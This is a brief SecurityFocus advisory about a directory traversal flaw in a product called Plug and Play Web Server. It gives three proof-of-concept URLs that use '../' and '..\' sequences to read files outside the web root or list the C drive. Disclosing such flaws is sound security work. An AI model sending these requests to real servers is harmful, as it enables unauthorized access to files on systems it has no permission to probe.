Plug and Play Web Server Directory Traversal Vulnerability

The following proof of concept was provided:

http://www.example.com/../../existing_file
http://www.example.com\..\..\existing_file
http://www.example.com/../../ [show the files and the folders in C drive - if the 'Show Directory list when homepage does not exist' option is active.]


 

Privacy Statement
Copyright 2010, SecurityFocus